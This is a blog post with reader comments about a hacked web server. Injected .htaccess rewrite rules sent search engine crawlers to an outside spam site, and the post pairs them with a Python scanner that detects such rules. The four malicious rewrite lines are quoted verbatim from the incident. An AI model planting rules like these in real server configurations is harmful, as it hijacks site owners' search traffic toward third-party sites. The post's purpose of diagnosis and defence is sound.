Finding the nonexistent
So much for a quiet Paddy’s Day.
As The Old Fart wrote yesterday, we had a bit of trouble on the server. He claimed credit for finding the cause, but he really hasn’t a clue.
The symptom of the problem was that the blogs that I host seemed to vanish off Google’s radar. Any search, for example for ‘head rambles’, would only produce old results, while the newer material just failed to appear at all.
I ran the usual tests, and Google reported that the sites were fine and were being spidered on a regular and frequent basis, so what the hell was going on?
I checked the logs for a couple of the blogs and found some very unusual activity. There was indeed a phenomenal number of visits to the sites from Google, but they were successfully finding files and directories that didn’t exist!
How do you successfully find something that doesn’t exist? For a while I was baffled.
I think it was more intuition and luck than logic, but I checked the .htaccess files and there it was in all its glory – a hack.
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://doormoney.biz/ [R=301,L]
Somehow [and I still don’t know quite how] they managed to modify each .htaccess file and add those lines.
The upshot was that Google was visiting what it thought were my sites, but was in fact visiting that other site, which as far as I can make out is a warez site.
Needless to say, I removed the lines and locked down the files, and immediately Google started getting a 404 [not found] instead of a 200 [successful] so that solved that.
Since then, one of my Elite Bloggers posted an article, and it appeared within fifteen minutes in Google.
I did a wee search around the Internet to see if this was a common hack and it is not unknown. I found a couple of interesting articles on it here and here.
So someone else had a wasted Paddy’s Day too?
I am not alone.
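A check for this kind of injected rule, as an added example that is not code from the original post: it flags any RewriteRule that is gated on a crawler User-Agent and points at an external URL, and also reports .htaccess files that group or others can write. The function names, the crawler names beyond the three in the rule above, and the host redirect.example are assumptions made for the illustration.

```python
import os
import re
import stat
import sys

# Crawler names from the injected rule above, plus a few assumed extras.
CRAWLERS = re.compile(r"googlebot|slurp|msnbot|bingbot|yandex|baiduspider", re.I)
# Constructed sample: the injected rule shape (placeholder host), then a normal rule.
SAMPLE = """RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://redirect.example/ [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""

def find_cloaked_redirects(text):
    """Return (line_no, target) for each RewriteRule sending crawlers off-site."""
    hits, pending = [], []  # pending: RewriteConds waiting for their rule
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        directive = parts[0].lower() if parts else ""  # comment lines never match
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append((parts[1].upper(), parts[2]))
        elif directive == "rewriterule":
            # Conditions bind only to the next RewriteRule, so consume them here.
            gated = any("HTTP_USER_AGENT" in var and CRAWLERS.search(pat)
                        for var, pat in pending)
            if gated and len(parts) >= 3 and re.match(r"https?://", parts[2], re.I):
                hits.append((no, parts[2]))
            pending = []
    return hits

def loosely_writable(mode):
    """True when group or other may write the file (666 or 777, but not 644)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def scan(docroot):
    """Yield (path, mode, hits) for every .htaccess under docroot with either problem."""
    for folder, _dirs, files in os.walk(docroot):
        if ".htaccess" in files:
            path = os.path.join(folder, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_cloaked_redirects(fh.read())
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if hits or loosely_writable(mode):
                yield (path, oct(mode), hits)

if __name__ == "__main__":
    print(list(scan(sys.argv[1])) if len(sys.argv) > 1 else find_cloaked_redirects(SAMPLE))
```

Run with a document root as the only argument to scan every .htaccess beneath it; with no argument it checks the constructed sample.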
What a clever way to do things. Hope the perpetrator dies of bleeding piles.
I checked mine just to make sure and all clear on that account. Stands to reason since there’s mighty slim pickings over at my place.
So we’ve chmod’d the .htaccess file to something other than 777 now? 😉
Kirk M beat me to it as I was going to suggest changing permissions on .htaccess. Typically it is left writable as some WordPress plugins need to access it.
Still, it doesn’t explain how they overwrote it in the first place.
I found this article helpful in the past:
http://www.linux.com/articles/113974?theme=print
One of my tech buddies is working on a .htaccess monitor, which should be interesting.
777? All 644. 😈
I think I figured it out. I’ll shoot you an email.
Hmm my earlier comment got lost in the ether 😐
You had better write it again then, Robert?
Can’t remember what it was now but it did have a link and probably fell foul of yer filters!
Yup. You are a spammer!!!
Not intentionally 😉
Just saw this on a client site. Did you ever track down the source of this junk?
Welcome, Matt! No. I never heard anything more about it. One of those little mysteries sent to annoy us.